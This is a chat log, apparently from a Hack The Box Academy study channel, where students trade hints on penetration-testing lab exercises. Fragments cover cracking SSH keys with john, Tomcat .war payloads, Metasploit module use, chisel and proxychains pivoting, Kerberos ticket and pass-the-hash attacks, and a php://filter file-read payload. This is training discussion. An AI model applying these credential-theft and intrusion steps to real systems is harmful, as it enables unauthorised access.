run it with python2
how would i run it with python 2
you need to edit the script and replace base64.decodestring with base64.decodebytes, which is the first answer you get on google for the error
or just run with py2 lol
I prefer this solution, you edit it once and never think about it again
john just wont do it
ssh.hashes] couldn't parse keyfile
python2 ssh2john.py ssh.private > ssh.hash
john --wordlist=~/Desktop/mut_password.list ~/Desktop/id_rsa1.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
bash: ssh1.txt: Permission denied
python2 ssh2john ~/Desktop/id_rsa1.txt > ssh1.hash
bash: ssh1.hash: Permission denied
nvrmnd i gotit
had to run ssh2john from john folder
sure it was that
I have a question on mimikatz and the AD skills assessments, last time I did this module (about a year ago) I was able to find cleartext creds with mimikatz at one point on the skills assessments both 1 and 2. This go around those same fields show (null). I am perplexed as to why it showed cleartext password last time and not this time around. It is probably something simple I am missing or maybe a change... Anyone have an idea for this?
https://academy.hackthebox.com/achievement/1009496/89 - Feel good about this one
You should be using the mutated list
And doing -t 48 to speed it up
Also don't brute ssh with hydra
the mutated list I created in one of the previous sections?
On the shells and payloads live engagement I am confused about the Tomcat portion.
Where was that covered in the previous lessons?
You mean the .war?
Yeah, which module covered Tomcat? I'm trying to brush up on that section.
There's none that specifically covers tomcat
It's about research
So hacktricks probably?
When you visit tomcat manager you see it allows you to upload .war files
So you craft a payload around it
Yeah, I've used it before a couple months ago on another box, I was just confused because I didn't remember any HTB specific lesson on it thus far.
The closest is the msfvenom section
Yeah, I went back through that, it helped.
That teaches you about the tool
I'm pretty good with msfvenom, have some templates in my notes.
But tbh if they did a tomcat module, they'd have to do nginx, apache and others
That might be worthwhile, but I guess it's easier to just have people supplement with their own research. I'm just still working through trying to figure out what I should know from the HTB curriculum, and what I need to discover on my own.
The live engagement is all about research and crafting payloads based on it
Okay, thank you.
discover everything that isn't mentioned
The skill assessments won't always be 1-1 to the section, if they told you about tomcat it wouldn't be much of a skill assessment would it
You'd just copy/paste the payload and not figure out why
I'm realizing that with some of the modules.
I forgot to switch my VPN to UDP like you mentioned, but it's slightly faster today.
You had mentioned yesterday that UDP might be faster, so I was going to try that but forgot.
I remember now, the Tomcat material I had was from my TryHackMe notes
When did I say UDP would be faster?
I actively advocate for people to use the tcp download
I guess you said "prefer" not faster
I misread what you said
so TCP is faster?
It's more stable
Stability > speed
Literally 99.9999% of issues people have with the rdp sections is bc udp
Good to know, glad I clarified, thanks!
And I say that bc (even without changing vpn regions) when people download and use the tcp one, they say their issue is resolved with the connection dropping
Is there any situation where UDP would be preferred in the case of a VPN?
cause there's always a chance it will cause some connection issues
Probably restrictions in more locked down countries
need help with this question . i have gotten into root but cant seem to smb client into dc01/linux01$. this is the question . "Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." is there something i am missing
Because root is not linux01$
ok so where am i going wrong
You need to find the ticket, perhaps using the tool from the section can help you find it
linikatz
Are you asking me or telling me
im asking
tbh the module tells you exactly where a machine account ticket can usually be found
this is all that shows for linux01$
You can't post screenshots
srry
I recommend going back to the section on finding kerberos tickets in Linux
Why are you apologizing?
said not to send screenshots
find tickets besides linux01$
to find the correct ticket ^
the module gives you the exact location
julio carlos etc
Check all the directories given by the output
One of them is the daemon you see in realms info
seriously, go back to the module
there's no need for a tool even or anything more than knowing the location, which is explicitly pointed out
why do i want to die when im doing machines
It's better to know the tool for practical engagements
tbh I don't remember what tool we're talking about
Just blind copying is what leads to not knowing what to do
you can find tickets with the find command and extract hashes with the python script, what else was there? 🤔
its asking for password
What happens if you just hit enter (no password)
Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
Where is the 50064.rb in metasploit on the shells and payloads live engagement?
I've tried searching by noun name, searching by number, I even tried importing it and metasploit still cant find it.
The hint just says to use the "use" function...?
and have you tried using the use function?
well you can definitely find it with searchsploit, but or just do what the hint says and type use number.rb
again, did you try the use function?
still cant log into lin01$
I did not
There is no number for me to use
I am expecting the one result so that I can "use 0"
Linux01$
And are you sure you're using the right ccache
did you see my comment above?
this one right here
Literally just do use 50064.rb
I didn't want to spell it out but there you go
I did and it threw a bunch of errors
I even followed a walkthrough on how to manually upload the exploit
It's already there:^)
You could also, after using searchsploit, do locate 50064.rb
That was helpful, I was able to find it in a few spots.
One of them being the .msf*
I'm still just confused why I can't use the search function for it and "use 0"
It's what I've always done with metasploit
This is showing other ways to use Metasploit
So anything from searchsploit is done manually with "use <filename>" and anything searched within metasploit is done with the "use #" option?
Basically
You can even do use filename/path even if you can search it in Metasploit
Good to know, thanks!
in the attack common services module, assessment easy, there are 2 ways to get the flag. i got the flag via brute force and then the sqlmap command. whats the second method?
any clues
Hi can you help me with the last stage of the Q3 for this task, I am stuck after finding fiona's creds. can I DM you?
enumerate other services after you get the creds
I did login to mssql, found john as well which is impersonable, but hints say there should be a second impersonable account that I can't find, and I am stuck after finding John's account, may I dm you with the steps I have undertaken?
john is the correct account to impersonate
think deeper or go back to the sql section to look for other ways to enumerate mssql
dm me if you still need help
Hi! i got stuck in password attacks Passwd, Shadow & Opasswd part. I basically did the whole thing, got the root hash and when i used hashcat with rockyou.txt the result was some kind of Vamos! thing. What am i missing? thank you
That's meaning it's exhausted, the password is in the list you created earlier in the module
thank you!
<@&861185840277487616>
Hmm
Sirg this isn't Google
it's hilarious that that part wasn't deleted lol
Hey Guys, I'm stuck on "Web Attacks - Skills Assessment",
I don't find the way to change the ||PHPSESSID so I can get the admin token|| can someone please give me a nudge
how can i compile a exploit on my system that works on target system
i dont think you can do anything with phpsessid
so how can I get the token???
search for IDOR
tell me if need help still
sqlmap ? 🤣
just ask
I'm trying to get the token, but there's something I missing ...
I can't get the admin token & I can't change the user phpsessid so I'm kinda stuck 😕
Everything you need to know should be in the module
Hello! Having troubles with proxychains because it doesnt resolve hostname: dc01.inlanefreight.htb Command:proxychains3 evil-winrm -i 172.16.1.15 -r inlanefreight.htb
Output:|DNS-response|: dc01.inlanefreight.htb does not exist Any help would be appreciated - thx
/etc/hosts: 172.16.1.15 inlanefreight inlanefreight.htb dc01 dc01.inlanefreight.htb
can you do nslookup dc01.inlanefreight.htb
oh thats weird
Because the 172 is an internal ip only reachable through target machine
Order is 10.129.x.x is target -> 172.16.x.x internal network on target
I assume you have a pivot/proxy on the spawned target
If not, that's why
yes i have a reverse chisel tunnel running
proxy#R:127.0.0.1:1080=>socks: Listening
You have the chisel server running on your machine yeah?
yes
Also when you did nslookup did you do proxychains nslookup
yes
Weird I dont recall having many issues with this module, just followed step by step
Perhaps you're missing an intermediary host
what do you mean by intermediary host
But other than that not sure what else
A target between the spawned target and the one referenced in the question
need help?
@fathom pendant don't really understand what the intermediary host could be? sry
hows your proxychains setup?
The section would reference it
@sudden blaze can u cat ur proxychains.conf file
But also I'm 99% sure that .15 isn't the dc01
and grep for proxy_dns
This module doesn't go that in depth
ahh okay
And modifying /etc/hosts isn't required
[ProxyList]
add proxy here ...
meanwile
defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
Wrap it in triple backticks
Like this
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
what module is this so I can check my notes?
Pivoting port forwarding module
If I'm not mistaken
My notes on this module are mostly lacking but thats also because it was 99% just follow the steps
Now stuck for days on Module: Password Attacks Section: pass the ticket from Linux optional exercises
Oh
It's optional
Just skip it
You're gonna give yourself more headaches
Since most people did just skip the optional exercises
yeah, I did skip that part, so speculation would be all I can provide
They don't/won't have notes on them
@sudden blaze can you connect to the host directly without proxychains?
The 172? No
have you configured all the stuff with kerberos?
oh right i see you mentioned chisel
uhhh
i haven't really touched that before, but does the chisel server allow for dns configs then?
Tbh learn how to use Ligolo for proxies
like the krb5.conf file? @sudden blaze
ive heard a lot of good things about ligolo tbh
tbh, yeah, I bet it'd work with ligolo-ng
All the tools mentioned in the pivoting module look like a joke comparatively
pretty much, I did the exercises both as intended and with ligolo as I was learning it at the time, night and day
@sudden blaze can you do chisel server --dns?
looks like it is supported according to their man page
Doesn't look like it's required? But like I said optional, so speculation at this point
You can always return to these questions later after completing the module
so the command mentioned there proxychains evil-winrm -i dc01 -r inlanefreight.htb, it seems like you're missing the -i dc01 part or was that lost somewhere else in the chat?
I just looked at the module and it mentions the ms01 host
maybe it's important to specify dc01 instead of the IP
Then dc01
i tried both -i dc01 and -i 172.16.1.5
Order is linux01 -> ms01 -> dc01
yeah, I saw that too, unclear if they can reach both at the same time or have to go through ms01
yes
im not sure about that but i assigned it to that ip like in the module
then you should check to be sure
^
The examples don't even show adding the ip to the hosts file and calling directly dc01 and inlanefreight.htb through proxychains
me: la la la skips optional stuff
optional stuff: appears on exam
I'd find that hilarious
@fathom pendant Oh my 🙂 it is not!
```
root@linux01:/home/svc_workstations@inlanefreight.htb# nslookup dc01
Server: 172.16.1.10
Address: 172.16.1.10#53
Name: dc01.inlanefreight.htb
Address: 172.16.1.10
```
oooooo
there you go
If only I suggested that half an hour ago
Hey thx
4head move
Always double check and verify info
Now do nslookup for ms01
Which is also referenced
yeah, often the module is giving an example and the exercise changes some parameters
where are you at

@fathom pendant do you know when ur gonna take ur cpts yet?
After I finish the modules
Had some life changes that put things on pause
And doing anything rdp related on my current setup is like 1 fpm
how much do you have left?
Ad enum and after
gotta say Zephyr was pretty useful, not a single RDP session in sight
tbh by how much you've been helping people I always figured you had completed the path
Hey everyone, I got 2 quick questions that were bugging me a little. 1: Why is there a VPN for the labs? I always connect to it, but it seems like you can access most machines without it. 2: What is blood for a machine?
Don't have money to even want to attempt prolabs
hope all is better now
if you're using pwnbox you won't need the vpn
vpn is for when you spin up your own VM
Common sense is a hell of a drug
got the ||token||, trying to change the ||password of the privilege user|| but I get ||Missing parameters|| when I use ||PUT|| and with ||POST|| I get ||Access Denied||
I am using SSH, but still, I can access the IPs
This seems related to the main site
through pwnbox?
Not academy
Nope, my own VM
Well, the second question maybe. But the first one is related to Academy
if it's a public IP you can reach it, if it's private, you need the VPN
So it depends on the module?
You shouldn't be able to access the 10.129.x.x sites without vpn but if it's a public ip vpn not required
yup
Alright, thanks!
- Blood = first to pwn
2 bloods, user and root - related to their respective flags
didn't try with the most common one
😉
with Burp
right click > change request method
just did it I think ...
good to know, so right click is not the same as ||put||
its automagically done
remember that GET or PUT parameters travel in the URL
and POST ones in the body
Burp handles that by itself
thanx
I did forget that
Hi! i got stuck at password attacks reading DC01 with david's hash, i tried both methods, the one with mimikatz always gave me an administrator cmd, the Invoke-SMBExec says david doesn't have write privilege on DC01. What am i missing?
lateral movement?
worked with julio but not with david
which section dude
password attacks pass the hash(first)
Say, I used ||php://filter/convert.base64-encode/resource=...|| to get the flag
is there another way U did it so I can practice??
thanx